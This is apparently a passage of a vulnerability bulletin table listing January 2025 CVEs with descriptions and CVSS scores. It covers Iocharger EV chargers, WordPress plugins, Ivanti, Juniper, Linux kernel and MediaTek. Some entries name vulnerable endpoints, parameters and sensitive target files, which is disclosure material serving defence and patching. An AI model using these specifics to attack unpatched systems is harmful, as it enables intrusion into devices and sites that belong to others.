Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC model chargers before version 24120701. Likelihood: Moderate - It might be difficult for an attacker to identify the file structure of the <redated> directory, and then modify the backup to add a new CGI script in the correct directory. Furthermore, the attacker will need an account to restore the settings backup, or convince a user with such access to upload a modified backup file. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and deletefiles and services. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H), and compromised devices can be used to pivot into networks that should potentially not be accessible (SC:L/SI:L/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43656 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC model chargers before version 24120701. Likelihood: High. However, the attacker will need a (low privilege) account to gain access to the action.exe CGI binary and upload the crafted firmware file, or convince a user with such access to upload it. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and deletefiles and services. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H), and compromised devices can be used to pivot into networks that should potentially not be accessible (SC:L/SI:L/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43657 |
| Iocharger--Iocharger firmware for AC models |
After gaining access to the firmware of a charging station, a file at <redacted> can be accessed to obtain default credentials that are the same across all Iocharger AC model EV chargers. This issue affects Iocharger firmware for AC models before firmware version 25010801. The issue is addressed by requiring a mandatory password change on first login, it is still recommended to change the password on older models. Likelihood: Moderate - The attacker will first have to abuse a code execution or file inclusion vulnerability (for example by using <redacted>.sh) to gain access to the <redacted>.json file, or obtain a firmware dump of the charging station or obtain the firmware via other channels. Impact: Critical - All chargers using Iocharger firmware for AC models started with the same initial password. For models with firmware version before 25010801 a password change was not mandatory. It is therefore very likely that this firmware password is still active on many chargers. These credentials could, once obtained, allow an attacker to log into many Iocharger charging station, and allow them to execute arbitrary commands via the System → Custom page. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, and requires high privileges (PR:H), there is no user interaction required (UI:N). The attack leads to a compromised of the confidentialy of the "super user" credentials of the device (VC:H/VI:N/VA:N), and can subsequently be used to full compromise and other devices (SC:H/SI:H/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | 7.2 | CVE-2024-43659 |
| Iocharger--Iocharger firmware for AC models |
The CGI script <redacted>.sh can be used to download any file on the filesystem. This issue affects Iocharger firmware for AC model chargers beforeversion 24120701. Likelihood: High, but credentials required. Impact: Critical - The script can be used to download any file on the filesystem, including sensitive files such as /etc/shadow, the CGI script source code or binaries and configuration files. CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/S:P/AU:Y CVSS clarification. The attack can be executed over any network connection the station is listening to and serves the web interface (AV:N), and there are no additional security measure sin place that need to be circumvented (AC:L), the attack does not rely on preconditions (AT:N). The attack does require authentication, but the level of authentication is irrelevant (PR:L), it does not require user interaction (UI:N). The confidentiality of all files of the devicd can be compromised (VC:H/VI:N/VA:N). There is no impact on subsequent systems. (SC:N/SI:N/SA:N). While this device is an EV charger handing significant amounts of power, this attack in isolation does not have a safety impact. The attack can be automated (AU:Y). | 2025-01-09 | 7.5 | CVE-2024-43660 |
| Iqonic Design--WPBookit |
The WPBookit plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 1.6.4. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. | 2025-01-09 | 9.8 | CVE-2024-10215 |
| IronTemplates--Croma Music |
The Croma Music plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'ironMusic_ajax' function in all versions up to, and including, 3.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2025-01-07 | 8.8 | CVE-2024-12202 |
| Ivanti--Connect Secure |
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution. | 2025-01-08 | 9 | CVE-2025-0282 |
| Ivanti--Connect Secure |
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a local authenticated attacker to escalate their privileges. | 2025-01-08 | 7 | CVE-2025-0283 |
| Jason Keeley, Bryan Nielsen--Affiliate Disclosure Statement |
Cross-Site Request Forgery (CSRF) vulnerability in Jason Keeley, Bryan Nielsen Affiliate Disclosure Statement allows Cross Site Request Forgery.This issue affects Affiliate Disclosure Statement: from n/a through 0.3. | 2025-01-07 | 7.1 | CVE-2025-22552 |
| Jay Krishnan G--JK Html To Pdf |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jay Krishnan G JK Html To Pdf allows Stored XSS.This issue affects JK Html To Pdf: from n/a through 1.0.0. | 2025-01-07 | 7.1 | CVE-2025-22547 |
| Jens Trnell--WP Simple Sitemap |
Cross-Site Request Forgery (CSRF) vulnerability in Jens Törnell WP Simple Sitemap allows Stored XSS.This issue affects WP Simple Sitemap: from n/a through 0.2. | 2025-01-07 | 7.1 | CVE-2025-22342 |
| Jonathan Kern--WPListCal |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Jonathan Kern WPListCal allows SQL Injection.This issue affects WPListCal: from n/a through 1.3.5. | 2025-01-09 | 8.5 | CVE-2025-22535 |
| Joomla! Project--Joomla! CMS |
Lack of output escaping in the id attribute of menu lists. | 2025-01-07 | 7.5 | CVE-2024-40748 |
| Joomla! Project--Joomla! CMS |
Improper Access Controls allows access to protected views. | 2025-01-07 | 7.5 | CVE-2024-40749 |
| jumpdemand--4ECPS Web Forms |
Unrestricted Upload of File with Dangerous Type vulnerability in jumpdemand 4ECPS Web Forms allows Upload a Web Shell to a Web Server.This issue affects 4ECPS Web Forms: from n/a through 0.2.18. | 2025-01-09 | 10 | CVE-2025-22504 |
| Juniper Networks--Junos OS |
An Out-of-bounds Read vulnerability in Juniper Networks Junos OS and Junos OS Evolved's routing protocol daemon (rpd) allows an unauthenticated, network-based attacker to send malformed BGP packets to a device configured with packet receive trace options enabled to crash rpd. This issue affects: Junos OS: * from 21.2R3-S8 before 21.2R3-S9, * from 21.4R3-S7 before 21.4R3-S9, * from 22.2R3-S4 before 22.2R3-S5, * from 22.3R3-S2 before 22.3R3-S4, * from 22.4R3 before 22.4R3-S5, * from 23.2R2 before 23.2R2-S2, * from 23.4R1 before 23.4R2-S1, * from 24.2R1 before 24.2R1-S1, 24.2R2. Junos OS Evolved: * from 21.4R3-S7-EVO before 21.4R3-S9-EVO, * from 22.2R3-S4-EVO before 22.2R3-S5-EVO, * from 22.3R3-S2-EVO before 22.3R3-S4-EVO, * from 22.4R3-EVO before 22.4R3-S5-EVO, * from 23.2R2-EVO before 23.2R2-S2-EVO, * from 23.4R1-EVO before 23.4R2-S1-EVO, * from 24.2R1-EVO before 24.2R1-S2-EVO, 24.2R2-EVO. This issue requires a BGP session to be established. This issue can propagate and multiply through multiple ASes until reaching vulnerable devices. This issue affects iBGP and eBGP. This issue affects IPv4 and IPv6. An indicator of compromise may be the presence of malformed update messages in a neighboring AS which is unaffected by this issue: For example, by issuing the command on the neighboring device:  show log messages Reviewing for similar messages from devices within proximity to each other may indicate this malformed packet is propagating:  rpd[<pid>]: Received malformed update from <IP address> (External AS <AS#>) and  rpd[<pid>]: Malformed Attribute | 2025-01-09 | 7.5 | CVE-2025-21598 |
| Juniper Networks--Junos OS Evolved |
A Missing Release of Memory after Effective Lifetime vulnerability in the Juniper Tunnel Driver (jtd) of Juniper Networks Junos OS Evolved allows an unauthenticated network-based attacker to cause Denial of Service. Receipt of specifically malformed IPv6 packets, destined to the device, causes kernel memory to not be freed, resulting in memory exhaustion leading to a system crash and Denial of Service (DoS). Continuous receipt and processing of these packets will continue to exhaust kernel memory, creating a sustained Denial of Service (DoS) condition. This issue only affects systems configured with IPv6. This issue affects Junos OS Evolved: * from 22.4-EVO before 22.4R3-S5-EVO, * from 23.2-EVO before 23.2R2-S2-EVO, * from 23.4-EVO before 23.4R2-S2-EVO, * from 24.2-EVO before 24.2R1-S2-EVO, 24.2R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 22.4R1-EVO. | 2025-01-09 | 7.5 | CVE-2025-21599 |
| ka2--Custom DataBase Tables |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ka2 Custom DataBase Tables allows Reflected XSS.This issue affects Custom DataBase Tables: from n/a through 2.1.34. | 2025-01-09 | 7.1 | CVE-2025-22539 |
| KaiYuanTong--ECT Platform |
A vulnerability, which was classified as critical, has been found in KaiYuanTong ECT Platform up to 2.0.0. Affected by this issue is some unknown functionality of the file /public/server/runCode.php of the component HTTP POST Request Handler. The manipulation of the argument code leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 7.3 | CVE-2025-0328 |
| kiKx--Kikx Simple Post Author Filter |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kiKx Kikx Simple Post Author Filter allows Reflected XSS.This issue affects Kikx Simple Post Author Filter: from n/a through 1.0. | 2025-01-07 | 7.1 | CVE-2025-22355 |
| kmfoysal06--SimpleCharm |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kmfoysal06 SimpleCharm allows Reflected XSS.This issue affects SimpleCharm: from n/a through 1.4.3. | 2025-01-07 | 7.1 | CVE-2024-56056 |
| Konrad Karpieszuk--WC Price History for Omnibus |
Deserialization of Untrusted Data vulnerability in Konrad Karpieszuk WC Price History for Omnibus allows Object Injection.This issue affects WC Price History for Omnibus: from n/a through 2.1.4. | 2025-01-09 | 7.2 | CVE-2025-22510 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the CobrancaController.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the local_recepcao parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 3.2.8. | 2025-01-10 | 8.3 | CVE-2025-22597 |
| LabRedesCefetRJ--WeGIA |
WeGIA is a web manager for charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the cadastrarSocio.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the local_recepcao parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 3.2.8. | 2025-01-10 | 8.3 | CVE-2025-22598 |
| Lenderd--1003 Mortgage Application |
Missing Authorization vulnerability in Lenderd 1003 Mortgage Application allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects 1003 Mortgage Application: from n/a through 1.87. | 2025-01-07 | 7.5 | CVE-2025-22592 |
| librdf--Raptor RDF Syntax Library |
In Raptor RDF Syntax Library through 2.0.16, there is an integer underflow when normalizing a URI with the turtle parser in raptor_uri_normalize_path(). | 2025-01-10 | 9.3 | CVE-2024-57823 |
| lich_wang--WP-tagMaker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in lich_wang WP-tagMaker allows Reflected XSS.This issue affects WP-tagMaker: from n/a through 0.2.2. | 2025-01-07 | 7.1 | CVE-2025-22338 |
| linkid--linkID |
The linkID plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 0.1.2. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited. | 2025-01-09 | 8.6 | CVE-2024-12542 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: btrfs: fix use-after-free when COWing tree bock and tracing is enabled When a COWing a tree block, at btrfs_cow_block(), and we have the tracepoint trace_btrfs_cow_block() enabled and preemption is also enabled (CONFIG_PREEMPT=y), we can trigger a use-after-free in the COWed extent buffer while inside the tracepoint code. This is because in some paths that call btrfs_cow_block(), such as btrfs_search_slot(), we are holding the last reference on the extent buffer @buf so btrfs_force_cow_block() drops the last reference on the @buf extent buffer when it calls free_extent_buffer_stale(buf), which schedules the release of the extent buffer with RCU. This means that if we are on a kernel with preemption, the current task may be preempted before calling trace_btrfs_cow_block() and the extent buffer already released by the time trace_btrfs_cow_block() is called, resulting in a use-after-free. Fix this by moving the trace_btrfs_cow_block() from btrfs_cow_block() to btrfs_force_cow_block() before the COWed extent buffer is freed. This also has a side effect of invoking the tracepoint in the tree defrag code, at defrag.c:btrfs_realloc_node(), since btrfs_force_cow_block() is called there, but this is fine and it was actually missing there. | 2025-01-06 | 7.8 | CVE-2024-56759 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: ublk: detach gendisk from ublk device if add_disk() fails Inside ublk_abort_requests(), gendisk is grabbed for aborting all inflight requests. And ublk_abort_requests() is called when exiting the uring context or handling timeout. If add_disk() fails, the gendisk may have been freed when calling ublk_abort_requests(), so use-after-free can be caused when getting disk's reference in ublk_abort_requests(). Fixes the bug by detaching gendisk from ublk device if add_disk() fails. | 2025-01-06 | 7.8 | CVE-2024-56764 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries/vas: Add close() callback in vas_vm_ops struct The mapping VMA address is saved in VAS window struct when the paste address is mapped. This VMA address is used during migration to unmap the paste address if the window is active. The paste address mapping will be removed when the window is closed or with the munmap(). But the VMA address in the VAS window is not updated with munmap() which is causing invalid access during migration. The KASAN report shows: [16386.254991] BUG: KASAN: slab-use-after-free in reconfig_close_windows+0x1a0/0x4e8 [16386.255043] Read of size 8 at addr c00000014a819670 by task drmgr/696928 [16386.255096] CPU: 29 UID: 0 PID: 696928 Comm: drmgr Kdump: loaded Tainted: G B 6.11.0-rc5-nxgzip #2 [16386.255128] Tainted: [B]=BAD_PAGE [16386.255148] Hardware name: IBM,9080-HEX Power11 (architected) 0x820200 0xf000007 of:IBM,FW1110.00 (NH1110_016) hv:phyp pSeries [16386.255181] Call Trace: [16386.255202] [c00000016b297660] [c0000000018ad0ac] dump_stack_lvl+0x84/0xe8 (unreliable) [16386.255246] [c00000016b297690] [c0000000006e8a90] print_report+0x19c/0x764 [16386.255285] [c00000016b297760] [c0000000006e9490] kasan_report+0x128/0x1f8 [16386.255309] [c00000016b297880] [c0000000006eb5c8] __asan_load8+0xac/0xe0 [16386.255326] [c00000016b2978a0] [c00000000013f898] reconfig_close_windows+0x1a0/0x4e8 [16386.255343] [c00000016b297990] [c000000000140e58] vas_migration_handler+0x3a4/0x3fc [16386.255368] [c00000016b297a90] [c000000000128848] pseries_migrate_partition+0x4c/0x4c4 ... [16386.256136] Allocated by task 696554 on cpu 31 at 16377.277618s: [16386.256149] kasan_save_stack+0x34/0x68 [16386.256163] kasan_save_track+0x34/0x80 [16386.256175] kasan_save_alloc_info+0x58/0x74 [16386.256196] __kasan_slab_alloc+0xb8/0xdc [16386.256209] kmem_cache_alloc_noprof+0x200/0x3d0 [16386.256225] vm_area_alloc+0x44/0x150 [16386.256245] mmap_region+0x214/0x10c4 [16386.256265] do_mmap+0x5fc/0x750 [16386.256277] vm_mmap_pgoff+0x14c/0x24c [16386.256292] ksys_mmap_pgoff+0x20c/0x348 [16386.256303] sys_mmap+0xd0/0x160 ... [16386.256350] Freed by task 0 on cpu 31 at 16386.204848s: [16386.256363] kasan_save_stack+0x34/0x68 [16386.256374] kasan_save_track+0x34/0x80 [16386.256384] kasan_save_free_info+0x64/0x10c [16386.256396] __kasan_slab_free+0x120/0x204 [16386.256415] kmem_cache_free+0x128/0x450 [16386.256428] vm_area_free_rcu_cb+0xa8/0xd8 [16386.256441] rcu_do_batch+0x2c8/0xcf0 [16386.256458] rcu_core+0x378/0x3c4 [16386.256473] handle_softirqs+0x20c/0x60c [16386.256495] do_softirq_own_stack+0x6c/0x88 [16386.256509] do_softirq_own_stack+0x58/0x88 [16386.256521] __irq_exit_rcu+0x1a4/0x20c [16386.256533] irq_exit+0x20/0x38 [16386.256544] interrupt_async_exit_prepare.constprop.0+0x18/0x2c ... [16386.256717] Last potentially related work creation: [16386.256729] kasan_save_stack+0x34/0x68 [16386.256741] __kasan_record_aux_stack+0xcc/0x12c [16386.256753] __call_rcu_common.constprop.0+0x94/0xd04 [16386.256766] vm_area_free+0x28/0x3c [16386.256778] remove_vma+0xf4/0x114 [16386.256797] do_vmi_align_munmap.constprop.0+0x684/0x870 [16386.256811] __vm_munmap+0xe0/0x1f8 [16386.256821] sys_munmap+0x54/0x6c [16386.256830] system_call_exception+0x1a0/0x4a0 [16386.256841] system_call_vectored_common+0x15c/0x2ec [16386.256868] The buggy address belongs to the object at c00000014a819670 which belongs to the cache vm_area_struct of size 168 [16386.256887] The buggy address is located 0 bytes inside of freed 168-byte region [c00000014a819670, c00000014a819718) [16386.256915] The buggy address belongs to the physical page: [16386.256928] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14a81 [16386.256950] memcg:c0000000ba430001 [16386.256961] anon flags: 0x43ffff800000000(node=4|zone=0|lastcpupid=0x7ffff) [16386.256975] page_type: 0xfdffffff(slab) [16386 ---truncated--- | 2025-01-06 | 7.8 | CVE-2024-56765 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: fix double free in atmel_pmecc_create_user() The "user" pointer was converted from being allocated with kzalloc() to being allocated by devm_kzalloc(). Calling kfree(user) will lead to a double free. | 2025-01-06 | 7.8 | CVE-2024-56766 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: kunit: string-stream: Fix a UAF bug in kunit_init_suite() In kunit_debugfs_create_suite(), if alloc_string_stream() fails in the kunit_suite_for_each_test_case() loop, the "suite->log = stream" has assigned before, and the error path only free the suite->log's stream memory but not set it to NULL, so the later string_stream_clear() of suite->log in kunit_init_suite() will cause below UAF bug. Set stream pointer to NULL after free to fix it. Unable to handle kernel paging request at virtual address 006440150000030d Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [006440150000030d] address between user and kernel address ranges Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: iio_test_gts industrialio_gts_helper cfg80211 rfkill ipv6 [last unloaded: iio_test_gts] CPU: 5 UID: 0 PID: 6253 Comm: modprobe Tainted: G B W N 6.12.0-rc4+ #458 Tainted: [B]=BAD_PAGE, [W]=WARN, [N]=TEST Hardware name: linux,dummy-virt (DT) pstate: 40000005 (nZcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : string_stream_clear+0x54/0x1ac lr : string_stream_clear+0x1a8/0x1ac sp : ffffffc080b47410 x29: ffffffc080b47410 x28: 006440550000030d x27: ffffff80c96b5e98 x26: ffffff80c96b5e80 x25: ffffffe461b3f6c0 x24: 0000000000000003 x23: ffffff80c96b5e88 x22: 1ffffff019cdf4fc x21: dfffffc000000000 x20: ffffff80ce6fa7e0 x19: 032202a80000186d x18: 0000000000001840 x17: 0000000000000000 x16: 0000000000000000 x15: ffffffe45c355cb4 x14: ffffffe45c35589c x13: ffffffe45c03da78 x12: ffffffb810168e75 x11: 1ffffff810168e74 x10: ffffffb810168e74 x9 : dfffffc000000000 x8 : 0000000000000004 x7 : 0000000000000003 x6 : 0000000000000001 x5 : ffffffc080b473a0 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000001 x1 : ffffffe462fbf620 x0 : dfffffc000000000 Call trace: string_stream_clear+0x54/0x1ac __kunit_test_suites_init+0x108/0x1d8 kunit_exec_run_tests+0xb8/0x100 kunit_module_notify+0x400/0x55c notifier_call_chain+0xfc/0x3b4 blocking_notifier_call_chain+0x68/0x9c do_init_module+0x24c/0x5c8 load_module+0x4acc/0x4e90 init_module_from_file+0xd4/0x128 idempotent_init_module+0x2d4/0x57c __arm64_sys_finit_module+0xac/0x100 invoke_syscall+0x6c/0x258 el0_svc_common.constprop.0+0x160/0x22c do_el0_svc+0x44/0x5c el0_svc+0x48/0xb8 el0t_64_sync_handler+0x13c/0x158 el0t_64_sync+0x190/0x194 Code: f9400753 d2dff800 f2fbffe0 d343fe7c (38e06b80) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: Oops: Fatal exception | 2025-01-08 | 7.8 | CVE-2024-56772 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix handling of plane refcount [Why] The mechanism to backup and restore plane states doesn't maintain refcount, which can cause issues if the refcount of the plane changes in between backup and restore operations, such as memory leaks if the refcount was supposed to go down, or double frees / invalid memory accesses if the refcount was supposed to go up. [How] Cache and re-apply current refcount when restoring plane states. | 2025-01-08 | 7.8 | CVE-2024-56775 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Adding array index check to prevent memory corruption [Why & How] Array indices out of bound caused memory corruption. Adding checks to ensure that array index stays in bound. | 2025-01-08 | 7.8 | CVE-2024-56784 |
| MacWarrior--clipbucket-v5 |
ClipBucket V5 provides open source video hosting with PHP. Prior to 5.5.1 - 239, a file upload vulnerability exists in the Manage Playlist functionality of the application, specifically surrounding the uploading of playlist cover images. Without proper checks, an attacker can upload a PHP script file instead of an image file, thus allowing a webshell or other malicious files to be stored and executed on the server. This attack vector exists in both the admin area and low-level user area. This vulnerability is fixed in 5.5.1 - 239. | 2025-01-07 | 9.8 | CVE-2025-21624 |
| MacWarrior--clipbucket-v5 |
ClipBucket V5 provides open source video hosting with PHP. During the user avatar upload workflow, a user can choose to upload and change their avatar at any time. During deletion, ClipBucket checks for the avatar_url as a filepath within the avatars subdirectory. If the URL path exists within the avatars directory, ClipBucket will delete it. There is no check for path traversal sequences in the provided user input (stored in the DB as avatar_url) therefore the final $file variable could be tainted with path traversal sequences. This leads to file deletion outside of the intended scope of the avatars folder. This vulnerability is fixed in 5.5.1 - 237. | 2025-01-07 | 7.5 | CVE-2025-21622 |
| MacWarrior--clipbucket-v5 |
ClipBucket V5 provides open source video hosting with PHP. Prior to 5.5.1 - 238, ClipBucket V5 allows unauthenticated attackers to change the template directory via a directory traversal, which results in a denial of service. | 2025-01-07 | 7.5 | CVE-2025-21623 |
| Mahesh Waghmare--MG Parallax Slider |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mahesh Waghmare MG Parallax Slider allows Reflected XSS.This issue affects MG Parallax Slider: from n/a through 1.0.. | 2025-01-09 | 7.1 | CVE-2025-22330 |
| Marcon Simone--Wp advertising management |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marcon Simone Wp advertising management allows Reflected XSS.This issue affects Wp advertising management: from n/a through 1.0.3. | 2025-01-07 | 7.1 | CVE-2025-22358 |
| Mario Mansour and Geoff Peters--TubePress.NET |
Cross-Site Request Forgery (CSRF) vulnerability in Mario Mansour and Geoff Peters TubePress.NET allows Cross Site Request Forgery.This issue affects TubePress.NET: from n/a through 4.0.1. | 2025-01-07 | 7.1 | CVE-2025-22559 |
| Md. Rajib Dewan--Opencart Product in WP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Md. Rajib Dewan Opencart Product in WP allows Reflected XSS.This issue affects Opencart Product in WP: from n/a through 1.0.1. | 2025-01-07 | 7.1 | CVE-2025-22335 |
| mdshuvo--Post Grid Master Custom Post Types, Taxonomies & Ajax Filter Everything with Infinite Scroll, Load More, Pagination & Shortcode Builder |
The Post Grid Master - Custom Post Types, Taxonomies & Ajax Filter Everything with Infinite Scroll, Load More, Pagination & Shortcode Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.4.12 via the 'locate_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. The file included must have a .php extension. | 2025-01-09 | 9.8 | CVE-2024-11642 |
| MediaTek, Inc.--MT2735, MT2737, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6880T, MT6880U, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791T, MT8795T, MT8797, MT8798, MT8863 |
In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01231341 / MOLY01263331 / MOLY01233835; Issue ID: MSV-2165. | 2025-01-06 | 7.5 | CVE-2024-20149 |
| MediaTek, Inc.--MT2735, MT2737, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6880T, MT6880U, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791T, MT8795T, MT8797, MT8798, MT8863 |
In Modem, there is a possible system crash due to a logic error. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01412526; Issue ID: MSV-2018. | 2025-01-06 | 7.5 | CVE-2024-20150 |
| MediaTek, Inc.--MT2735, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6833P, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6880, MT6880T, MT6880U, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8666, MT8673, MT8675, MT8765, MT8766, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791T, MT8795T, MT8797, MT8798 |
In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00720348; Issue ID: MSV-2392. | 2025-01-06 | 8.1 | CVE-2024-20154 |
| MediaTek, Inc.--MT2737, MT3603, MT6835, MT6878, MT6886, MT6897, MT6990, MT7902, MT7920, MT7922, MT8365, MT8518S, MT8532, MT8666, MT8667, MT8673, MT8755, MT8766, MT8768, MT8775, MT8781, MT8786, MT8788, MT8796, MT8798, MT8893 |
In wlan STA driver, there is a possible out of bounds write due to improper input validation. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00389496 / ALPS09137491; Issue ID: MSV-1835. | 2025-01-06 | 8.1 | CVE-2024-20146 |
| MediaTek, Inc.--MT2737, MT6989, MT6991, MT7925, MT8365, MT8518S, MT8532, MT8666, MT8667, MT8673, MT8676, MT8678, MT8755, MT8766, MT8768, MT8775, MT8781, MT8786, MT8788, MT8796, MT8798, MT8893 |
In wlan STA, there is a possible way to trick a client to connect to an AP with spoofed SSID. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08990446 / ALPS09057442; Issue ID: MSV-1598. | 2025-01-06 | 7.5 | CVE-2024-20153 |
| MediaTek, Inc.--MT3603, MT6835, MT6878, MT6886, MT6897, MT7902, MT7920, MT7922, MT8518S, MT8532, MT8766, MT8768, MT8775, MT8796, MT8798 |
